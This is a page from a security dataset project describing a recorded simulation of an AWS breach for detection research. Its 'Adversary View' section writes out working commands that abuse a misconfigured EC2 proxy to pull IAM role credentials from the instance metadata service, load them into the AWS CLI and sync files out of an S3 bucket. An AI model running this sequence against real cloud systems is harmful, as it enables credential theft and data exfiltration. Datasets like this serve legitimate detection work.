Contents

AWS Cloud Bank Breach S3

Contents

AWS Cloud Bank Breach S3#

Metadata#


Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/09/13
Modification Date	2020/09/13
Tactics	TA0001,TA0003,TA0004,TA0005,TA0009
Techniques	T1078.004,T1530
Tags	EC2 Proxy Abuse,S3 Data Exfiltration

Dataset Description#

This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.

Datasets Downloads#

Type	Link
cloud	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip

Simulation Metadata#

Tools#

type	Name	Module
Cloud Formation Templates	AWS CLI	Exfiltration

Adversary View#

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"                                            
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0                                                                                                                                                              >

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
{
"Code" : "Success",
"LastUpdated" : "2020-09-14T00:49:26Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
"Token" : "TOKEN",
"Expiration" : "2020-09-14T07:10:27Z"
}

> aws configure --profile erratic
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
Default region name [None]: us-east-1
Default output format [None]: json

> echo aws_session_token = "TOKEN" >> ~/.aws/credentials 

> aws s3 ls --profile erratic
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic                                   
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.head(1)

References#

https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3